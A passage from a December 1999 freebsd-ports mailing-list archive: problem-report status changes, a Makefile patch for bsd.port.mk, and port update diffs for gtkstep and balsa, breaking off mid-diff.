23:14:28 -0800 (PST) From: Message-Id: <199912240714.XAA78464@freefall.freebsd.org> To: nakai@FreeBSD.org, freebsd-ports@FreeBSD.org, nakai@FreeBSD.org Subject: Re: ports/15565: x11-toolkits/rep-gtk updated Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: x11-toolkits/rep-gtk updated Responsible-Changed-From-To: freebsd-ports->nakai Responsible-Changed-By: nakai Responsible-Changed-When: Thu Dec 23 23:14:10 PST 1999 Responsible-Changed-Why: Over to the maintainer. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 23:15:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5F22D14E47; Thu, 23 Dec 1999 23:15:55 -0800 (PST) (envelope-from nakai@FreeBSD.org) Received: (from nakai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA78580; Thu, 23 Dec 1999 23:15:55 -0800 (PST) (envelope-from nakai@FreeBSD.org) Date: Thu, 23 Dec 1999 23:15:55 -0800 (PST) From: Message-Id: <199912240715.XAA78580@freefall.freebsd.org> To: nakai@FreeBSD.org, freebsd-ports@FreeBSD.org, nakai@FreeBSD.org Subject: Re: ports/15503: GNOME updates Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: GNOME updates Responsible-Changed-From-To: freebsd-ports->nakai Responsible-Changed-By: nakai Responsible-Changed-When: Thu Dec 23 23:15:30 PST 1999 Responsible-Changed-Why: Over to the maintainer(of some of them.) :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 0:11:25 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mls.gtonet.net (mls.gtonet.net [216.112.90.195]) by hub.freebsd.org (Postfix) with ESMTP id 41F331514F; Fri, 24 Dec 1999 00:11:18 -0800 (PST) (envelope-from freebsd@gtonet.net) Received: from pld (holeyman@pld.gtonet.net [216.112.90.200]) by mls.gtonet.net (8.9.3/8.9.3) with SMTP id AAA23160; Fri, 24 Dec 1999 00:11:18 -0800 (PST) (envelope-from freebsd@gtonet.net) From: "FreeBSD" To: "freebsd-stable@FreeBSD. ORG" , , Subject: broken port... Date: Fri, 24 Dec 1999 00:11:34 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org cute one though Updater failed: Cannot install "/usr/ports/japanese/tk80/patches/#cvs.cvsup-1394.186" to "/usr/pobts/japanese/tk80/patches/patch-ab": No such file or directory /usr/pobts :) FreeBSD freebsd@gtonet.net "LinSUX is only free if your time is worthless" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 0:20:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 198561577C; Fri, 24 Dec 1999 00:20:07 -0800 (PST) (envelope-from mharo@FreeBSD.org) Received: (from mharo@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA82842; Fri, 24 Dec 1999 00:20:06 -0800 (PST) (envelope-from mharo@FreeBSD.org) Date: Fri, 24 Dec 1999 00:20:06 -0800 (PST) From: Message-Id: <199912240820.AAA82842@freefall.freebsd.org> To: reg@shale.csir.co.za, mharo@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13677: Misc. Ports fix ups. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Misc. Ports fix ups. State-Changed-From-To: open->closed State-Changed-By: mharo State-Changed-When: Fri Dec 24 00:17:45 PST 1999 State-Changed-Why: It appears that everything in this PR has been handled. The only thing I'm not 100% about is the python change. If something still needs to be changed to python please submit a new PR which specificly talks about python. I'm closing this PR because it covers so much stuff with regards to other ports which have already been fixed and if it is left open I'm worried that others might spend time looking into the fixed parts. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 0:22:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1625414E49; Fri, 24 Dec 1999 00:22:30 -0800 (PST) (envelope-from mharo@FreeBSD.org) Received: (from mharo@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA83030; Fri, 24 Dec 1999 00:22:30 -0800 (PST) (envelope-from mharo@FreeBSD.org) Date: Fri, 24 Dec 1999 00:22:30 -0800 (PST) From: Message-Id: <199912240822.AAA83030@freefall.freebsd.org> To: mharo@FreeBSD.org, freebsd-ports@FreeBSD.org, kris@FreeBSD.org Subject: Re: ports/13808: linux-rvplayer port improved a'la netscape port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: linux-rvplayer port improved a'la netscape port Responsible-Changed-From-To: freebsd-ports->kris Responsible-Changed-By: mharo Responsible-Changed-When: Fri Dec 24 00:21:59 PST 1999 Responsible-Changed-Why: Over to MAINTAINER To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 3:34:42 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E0DEA14D7D; Fri, 24 Dec 1999 03:34:40 -0800 (PST) (envelope-from nakai@FreeBSD.org) Received: (from nakai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA97048; Fri, 24 Dec 1999 03:34:35 -0800 (PST) (envelope-from nakai@FreeBSD.org) Date: Fri, 24 Dec 1999 03:34:35 -0800 (PST) From: Message-Id: <199912241134.DAA97048@freefall.freebsd.org> To: rguyom@mail.dotcom.fr, nakai@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15525: macro AM_GNU_GETTEXT will not make use of libintl Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: macro AM_GNU_GETTEXT will not make use of libintl State-Changed-From-To: open->closed State-Changed-By: nakai State-Changed-When: Fri Dec 24 03:34:03 PST 1999 State-Changed-Why: Commited, thanks! You should send your patch to gettext author. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 3:40:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E3C4914FDB; Fri, 24 Dec 1999 03:40:49 -0800 (PST) (envelope-from nakai@FreeBSD.org) Received: (from nakai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA97731; Fri, 24 Dec 1999 03:40:49 -0800 (PST) (envelope-from nakai@FreeBSD.org) Date: Fri, 24 Dec 1999 03:40:49 -0800 (PST) From: Message-Id: <199912241140.DAA97731@freefall.freebsd.org> To: nakai@FreeBSD.org, freebsd-ports@FreeBSD.org, nakai@FreeBSD.org Subject: Re: ports/15558: /usr/ports/x11/gnomelibs fails to compile Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: /usr/ports/x11/gnomelibs fails to compile Responsible-Changed-From-To: freebsd-ports->nakai Responsible-Changed-By: nakai Responsible-Changed-When: Fri Dec 24 03:40:17 PST 1999 Responsible-Changed-Why: Over to the maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 5: 0:54 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail2.netcologne.de (mail2.netcologne.de [194.8.194.103]) by hub.freebsd.org (Postfix) with ESMTP id 9C5CD15213; Fri, 24 Dec 1999 05:00:51 -0800 (PST) (envelope-from van.woerkom@netcologne.de) Received: from oranje.my.domain (dial9-208.netcologne.de [194.8.195.208]) by mail2.netcologne.de (8.9.3/8.9.3) with ESMTP id OAA02533; Fri, 24 Dec 1999 14:00:48 +0100 (MET) Received: (from marc@localhost) by oranje.my.domain (8.9.3/8.9.3) id NAA03413; Fri, 24 Dec 1999 13:59:35 +0100 (CET) (envelope-from van.woerkom@netcologne.de) Date: Fri, 24 Dec 1999 13:59:35 +0100 (CET) Message-Id: <199912241259.NAA03413@oranje.my.domain> X-Authentication-Warning: oranje.my.domain: marc set sender to van.woerkom@netcologne.de using -f From: Marc van Woerkom To: cpiazza@freebsd.org, freebsd-ports@freebsd.org Subject: Quake stuff Reply-To: van.woerkom@netcologne.de Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! How do we deal with the upcoming wave of linux games? A fundamental question is "Do we put in ports in the ports tree that are commercial games demos?" This stuff is commercial, but usually offers some fun with a stuff that is publically available. If yes, where? - ports/games? (linux-quake3demo, linux-mythdemo..)? - ports/x11-opengl? - ports/x11-games? Should we add support ports to the ports tree that would help people who bought a linux game in a shop to make it easier for them to run it under FreeBSD? Regards, Marc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 5:23:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.scc.nl (node1374.a2000.nl [62.108.19.116]) by hub.freebsd.org (Postfix) with ESMTP id 0B5B514BC5 for ; Fri, 24 Dec 1999 05:23:36 -0800 (PST) (envelope-from freebsd-ports@scc.nl) Received: (from daemon@localhost) by mail.scc.nl (8.9.3/8.9.3) id NAA27825 for ports@FreeBSD.org; Fri, 24 Dec 1999 13:57:19 +0100 (CET) (envelope-from freebsd-ports@scc.nl) Received: from GATEWAY by dwarf.hq.scc.nl with netnews for ports@FreeBSD.org (ports@FreeBSD.org) To: ports@FreeBSD.org Date: Fri, 24 Dec 1999 13:57:09 +0100 From: Marcel Moolenaar Message-ID: <38636DA5.40D3E5CC@scc.nl> Organization: SCC vof Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: bsd.port.mk: MD5_FILE overrideable or not? Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [cc'd to Satoshi-san] When working on linux_base and linux_devtools I need to create checksums for both the i386 and the alpha packages. I can do most of the testing on a single architecture by setting MACHINE_ARCH. I like to have MACHINE_ARCH appended to the md5 file so that I can use `make makesum' as well. For this I need to override MD5_FILE (see patch). Is this a "feature" that is useful in more situations or not? Index: bsd.port.mk =================================================================== RCS file: /home/ncvs/ports/Mk/bsd.port.mk,v retrieving revision 1.324 diff -u -r1.324 bsd.port.mk --- bsd.port.mk 1999/11/11 02:36:15 1.324 +++ bsd.port.mk 1999/12/24 12:48:53 @@ -711,7 +711,7 @@ .else MD5?= md5 .endif -MD5_FILE= ${FILESDIR}/md5 +MD5_FILE?= ${FILESDIR}/md5 MAKE_FLAGS?= -f MAKEFILE?= Makefile -- Marcel Moolenaar mailto:marcel@scc.nl SCC Internetworking & Databases http://www.scc.nl/ The FreeBSD project mailto:marcel@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 5:26:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 668E114DF6; Fri, 24 Dec 1999 05:26:29 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA10273; Fri, 24 Dec 1999 05:26:29 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Fri, 24 Dec 1999 05:26:29 -0800 (PST) From: Message-Id: <199912241326.FAA10273@freefall.freebsd.org> To: grog@panic.sitaranetworks.com, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/14987: graphics/xpm does not build a dynamic library, only a static one Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: graphics/xpm does not build a dynamic library, only a static one State-Changed-From-To: open->feedback State-Changed-By: jedgar State-Changed-When: Fri Dec 24 05:25:34 PST 1999 State-Changed-Why: X/gcc bogons in -CURRENT were fixed a while ago, any objections to closing this PR? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 5:41:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AF44C15203; Fri, 24 Dec 1999 05:41:13 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA12760; Fri, 24 Dec 1999 05:41:13 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Fri, 24 Dec 1999 05:41:13 -0800 (PST) From: Message-Id: <199912241341.FAA12760@freefall.freebsd.org> To: camel@avias.com, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15305: can't install netpbm-8.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: can't install netpbm-8.0 State-Changed-From-To: open->feedback State-Changed-By: jedgar State-Changed-When: Fri Dec 24 05:39:51 PST 1999 State-Changed-Why: This does not appear to be reproducable on a recent -CURRENT sytem; can you please verify that it is still a problem. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 5:45:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D672115168; Fri, 24 Dec 1999 05:45:44 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA13267; Fri, 24 Dec 1999 05:45:44 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Fri, 24 Dec 1999 05:45:44 -0800 (PST) From: Message-Id: <199912241345.FAA13267@freefall.freebsd.org> To: jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org, jfitz@FreeBSD.org Subject: Re: ports/15404: www/p5-CGI: Wrong BUILD_DEPENDS? Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: www/p5-CGI: Wrong BUILD_DEPENDS? Responsible-Changed-From-To: freebsd-ports->jfitz Responsible-Changed-By: jedgar Responsible-Changed-When: Fri Dec 24 05:45:02 PST 1999 Responsible-Changed-Why: Over to maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 5:53:20 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 062F4158AC; Fri, 24 Dec 1999 05:53:16 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA13769; Fri, 24 Dec 1999 05:53:16 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Fri, 24 Dec 1999 05:53:16 -0800 (PST) From: Message-Id: <199912241353.FAA13769@freefall.freebsd.org> To: patrick@jacuzzi.local.mindstep.com, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15540: Update mod_dav to version 0.9.14 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update mod_dav to version 0.9.14 State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Fri Dec 24 05:48:00 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 6: 2:46 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 11950157CF; Fri, 24 Dec 1999 06:02:35 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA14317; Fri, 24 Dec 1999 06:02:34 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Fri, 24 Dec 1999 06:02:34 -0800 (PST) From: Message-Id: <199912241402.GAA14317@freefall.freebsd.org> To: nox@jelal.kn-bremen.de, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13201: New port: xmess (X11 emulator for game consoles, including pdp1) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: xmess (X11 emulator for game consoles, including pdp1) State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Fri Dec 24 05:57:43 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 6:56:35 1999 Delivered-To: freebsd-ports@freebsd.org Received: from 1Cust219.tnt2.washington.dc.da.uu.net (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id CFC0914F8A; Fri, 24 Dec 1999 06:56:32 -0800 (PST) (envelope-from green@FreeBSD.org) Date: Fri, 24 Dec 1999 09:56:30 -0500 (EST) From: Brian Fundakowski Feldman X-Sender: green@green.dyndns.org To: Steve Price Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/14859: OpenSSH has no support for the login class capability database. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There is nothing between the lines. Thanks for assigning the PR, I was just making a remark :) -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 7:20: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 824D514CC2 for ; Fri, 24 Dec 1999 07:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA72871; Fri, 24 Dec 1999 07:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 7DF6E14EC9; Fri, 24 Dec 1999 07:18:10 -0800 (PST) Message-Id: <19991224151810.7DF6E14EC9@hub.freebsd.org> Date: Fri, 24 Dec 1999 07:18:10 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15666: Update port: x11-toolkits/gtkstep to 2.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15666 >Category: ports >Synopsis: Update port: x11-toolkits/gtkstep to 2.0 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 07:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: >Organization: >Environment: >Description: * Updated version 1.10 to 2.0 Remove file: patches/patch-ac >How-To-Repeat: >Fix: diff -urN /usr/ports/x11-toolkits/gtkstep/Makefile x11-toolkits/gtkstep/Makefile --- /usr/ports/x11-toolkits/gtkstep/Makefile Fri Nov 12 08:23:26 1999 +++ x11-toolkits/gtkstep/Makefile Fri Dec 24 22:19:34 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: gtkstep -# Version required: 1.10 +# Version required: 2.0 # Date Created: 7 nov 98 # Whom: Gilad Rom # # $FreeBSD: ports/x11-toolkits/gtkstep/Makefile,v 1.12 1999/11/11 10:39:58 tg Exp $ # -DISTNAME= gtkstep-1.10 +DISTNAME= gtkstep-2.0 CATEGORIES= x11-toolkits MASTER_SITES= http://ulli.linuxbox.com/gtkstep/ diff -urN /usr/ports/x11-toolkits/gtkstep/files/md5 x11-toolkits/gtkstep/files/md5 --- /usr/ports/x11-toolkits/gtkstep/files/md5 Fri Nov 12 08:23:26 1999 +++ x11-toolkits/gtkstep/files/md5 Fri Dec 24 22:20:11 1999 @@ -1 +1 @@ -MD5 (gtkstep-1.10.tar.bz2) = 93f12a770c12a952e9c2ca40d0c2d8d6 +MD5 (gtkstep-2.0.tar.bz2) = b110ea3ab31cf4bb737d1bc32d1da99c diff -urN /usr/ports/x11-toolkits/gtkstep/patches/patch-ac x11-toolkits/gtkstep/patches/patch-ac --- /usr/ports/x11-toolkits/gtkstep/patches/patch-ac Thu Nov 11 19:39:59 1999 +++ x11-toolkits/gtkstep/patches/patch-ac Thu Jan 1 09:00:00 1970 @@ -1,11 +0,0 @@ ---- step/Theme/gtk/Makefile.in.orig Sat Nov 6 03:53:54 1999 -+++ step/Theme/gtk/Makefile.in Tue Nov 9 20:35:15 1999 -@@ -80,7 +80,7 @@ - VERSION = @VERSION@ - - themedir = $(datadir)/themes/Step/gtk --theme_DATA = gtkrc.in -+theme_DATA = gtkrc - - EXTRA_DIST = $(theme_DATA) - mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs diff -urN /usr/ports/x11-toolkits/gtkstep/pkg/DESCR x11-toolkits/gtkstep/pkg/DESCR --- /usr/ports/x11-toolkits/gtkstep/pkg/DESCR Fri Nov 12 08:23:31 1999 +++ x11-toolkits/gtkstep/pkg/DESCR Fri Dec 24 22:24:43 1999 @@ -1,4 +1,4 @@ -GTKstep is a patch to improve the boring -GTK+ look and feel with a NEXTSTEP(tm) look and feel. +GTKstep is a GTK+ theme engine to improve the boring +GTK+ look and feel with the NeXTSTEP(tm) look and feel. WWW: http://ulli.linuxbox.com/gtkstep/ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 7:20:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8C7E915152 for ; Fri, 24 Dec 1999 07:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA72862; Fri, 24 Dec 1999 07:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 287E215350; Fri, 24 Dec 1999 07:16:34 -0800 (PST) Message-Id: <19991224151634.287E215350@hub.freebsd.org> Date: Fri, 24 Dec 1999 07:16:34 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15665: Update port: mail/balsa to 0.6.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15665 >Category: ports >Synopsis: Update port: mail/balsa to 0.6.0 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 07:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: >Organization: >Environment: >Description: * Updated version 0.4.9.5 to 0.6.0 New file: patches/patch-ah patches/patch-ai patches/patch-aj patches/patch-ak >How-To-Repeat: >Fix: diff -urN /usr/ports/mail/balsa/Makefile mail/balsa/Makefile --- /usr/ports/mail/balsa/Makefile Sun Dec 5 20:15:45 1999 +++ mail/balsa/Makefile Thu Dec 23 07:17:52 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: balsa -# Version required: 0.4.9.5 +# Version required: 0.6.0 # Date created: 02 December 1998 # Whom: Glenn Johnson # # $FreeBSD: ports/mail/balsa/Makefile,v 1.12 1999/12/04 23:26:11 cpiazza Exp $ # -DISTNAME= balsa-0.4.9.5 +DISTNAME= balsa-0.6.0 CATEGORIES= mail gnome MASTER_SITES= ftp://ftp.balsa.net/pub/balsa/ @@ -17,12 +17,14 @@ PropList.2:${PORTSDIR}/devel/libPropList GTK_CONFIG?= ${X11BASE}/bin/gtk12-config +GLIB_CONFIG?= ${LOCALBASE}/bin/glib12-config USE_X_PREFIX= yes USE_LIBTOOL= yes LIBTOOLFILES= configure libmutt/configure CONFIGURE_ENV= CPPFLAGS='-I${LOCALBASE}/include' \ GTK_CONFIG='${GTK_CONFIG}' \ + GLIB_CONFIG='${GLIB_CONFIG}' \ LIBS='-L${LOCALBASE}/lib' CONFIGURE_ARGS= --localstatedir=${PREFIX}/share/gnome \ --datadir=${PREFIX}/share/gnome \ diff -urN /usr/ports/mail/balsa/files/md5 mail/balsa/files/md5 --- /usr/ports/mail/balsa/files/md5 Sat Nov 27 08:16:06 1999 +++ mail/balsa/files/md5 Thu Dec 23 03:43:42 1999 @@ -1 +1 @@ -MD5 (balsa-0.4.9.5.tar.gz) = b723043e86768d9c09af6fc76a9a63c2 +MD5 (balsa-0.6.0.tar.gz) = 3660c39d9a1a5712bfc51edf685b6308 diff -urN /usr/ports/mail/balsa/patches/patch-ah mail/balsa/patches/patch-ah --- /usr/ports/mail/balsa/patches/patch-ah Thu Jan 1 09:00:00 1970 +++ mail/balsa/patches/patch-ah Thu Dec 23 04:45:27 1999 @@ -0,0 +1,11 @@ +--- images/Makefile.in.orig Wed Dec 22 15:21:16 1999 ++++ images/Makefile.in Thu Dec 23 04:45:18 1999 +@@ -135,7 +135,7 @@ + + EXTRA_DIST = $(balsa_BITMAPS) + @sys_install_TRUE@balsabitmapsdir = $(gnomedatadir)/pixmaps/balsa +-@sys_install_FALSE@balsabitmapsdir = $(prefix)/pixmaps/balsa ++@sys_install_FALSE@balsabitmapsdir = $(gnomedatadir)/pixmaps/balsa + + balsabitmaps_DATA = $(balsa_BITMAPS) + mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs diff -urN /usr/ports/mail/balsa/patches/patch-ai mail/balsa/patches/patch-ai --- /usr/ports/mail/balsa/patches/patch-ai Thu Jan 1 09:00:00 1970 +++ mail/balsa/patches/patch-ai Thu Dec 23 05:15:06 1999 @@ -0,0 +1,20 @@ +--- libmutt/rfc1524.c.orig Fri Jan 3 23:18:25 1997 ++++ libmutt/rfc1524.c Thu Dec 23 05:14:52 1999 +@@ -455,7 +455,7 @@ + if (s[0] == '\0') + { + snprintf (s, l, "%s/muttXXXXXX", buf); +- mktemp (s); ++ mkstemp (s); + } + else + { +@@ -466,7 +466,7 @@ + if ((period = strrchr (tmp, '.')) != NULL) + *period = 0; + snprintf (s, l, "%s/%s.XXXXXX", buf, tmp); +- mktemp (s); ++ mkstemp (s); + if (period != NULL) + { + *period = '.'; diff -urN /usr/ports/mail/balsa/patches/patch-aj mail/balsa/patches/patch-aj --- /usr/ports/mail/balsa/patches/patch-aj Thu Jan 1 09:00:00 1970 +++ mail/balsa/patches/patch-aj Thu Dec 23 05:23:17 1999 @@ -0,0 +1,11 @@ +--- po/Makefile.in.in.orig Wed Dec 22 15:06:25 1999 ++++ po/Makefile.in.in Thu Dec 23 05:22:51 1999 +@@ -18,7 +18,7 @@ + + prefix = @prefix@ + exec_prefix = @exec_prefix@ +-datadir = $(prefix)/@DATADIRNAME@ ++datadir = $(prefix)/share + localedir = $(datadir)/locale + gnulocaledir = $(prefix)/share/locale + gettextsrcdir = $(prefix)/share/gettext/po diff -urN /usr/ports/mail/balsa/patches/patch-ak mail/balsa/patches/patch-ak --- /usr/ports/mail/balsa/patches/patch-ak Thu Jan 1 09:00:00 1970 +++ mail/balsa/patches/patch-ak Thu Dec 23 05:47:23 1999 @@ -0,0 +1,11 @@ +--- src/Makefile.in.orig Wed Dec 22 15:21:28 1999 ++++ src/Makefile.in Thu Dec 23 05:47:06 1999 +@@ -138,7 +138,7 @@ + + # index-child.h \ + +-INCLUDES = -DGNOMELOCALEDIR=\""$(datadir)/locale"\" -I$(top_srcdir) -I$(top_srcdir)/libbalsa -I$(top_srcdir)/idl -I$(top_builddir)/libmutt -I$(top_srcdir)/libmutt $(GNOME_INCLUDEDIR) ++INCLUDES = -DGNOMELOCALEDIR=\""$(prefix)/share/locale"\" -I$(top_srcdir) -I$(top_srcdir)/libbalsa -I$(top_srcdir)/idl -I$(top_builddir)/libmutt -I$(top_srcdir)/libmutt $(GNOME_INCLUDEDIR) + + + #libbalsa appearing twice is not a bug -- it is mutually dependent with libmutt diff -urN /usr/ports/mail/balsa/pkg/PLIST 